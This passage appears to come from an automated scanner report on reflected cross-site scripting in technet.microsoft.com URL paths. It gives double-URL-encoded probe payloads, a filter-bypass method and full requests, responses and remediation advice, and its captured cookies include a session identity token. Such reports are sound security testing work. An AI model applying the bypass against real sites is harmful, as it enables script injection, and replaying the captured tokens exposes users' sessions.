17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727070.aspxd35f4"><a>1af6e525b2c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25365%2522%253e%253ca%253e10433910e44 was submitted in the REST URL parameter 1. This input was echoed as 25365"><a>10433910e44 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us25365%2522%253e%253ca%253e10433910e44/library/bb727085.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us25365"><a>10433910e44/library/bb727085" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb47%2522%253e%253ca%253edd5971e5505 was submitted in the REST URL parameter 2. This input was echoed as 2bb47"><a>dd5971e5505 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2bb47%2522%253e%253ca%253edd5971e5505/bb727085.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2bb47"><a>dd5971e5505/bb727085" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca19c%2522%253e%253ca%253e185ce44d500 was submitted in the REST URL parameter 3. This input was echoed as ca19c"><a>185ce44d500 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727085.aspxca19c%2522%253e%253ca%253e185ce44d500 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727085.aspxca19c"><a>185ce44d500" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e4c%2522%253e%253ca%253e5114cf46764 was submitted in the REST URL parameter 1. This input was echoed as c1e4c"><a>5114cf46764 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc1e4c%2522%253e%253ca%253e5114cf46764/library/bb727091.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc1e4c"><a>5114cf46764/library/bb727091" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c0ed%2522%253e%253ca%253e31abbdfd032 was submitted in the REST URL parameter 2. This input was echoed as 5c0ed"><a>31abbdfd032 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5c0ed%2522%253e%253ca%253e31abbdfd032/bb727091.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:43 GMT
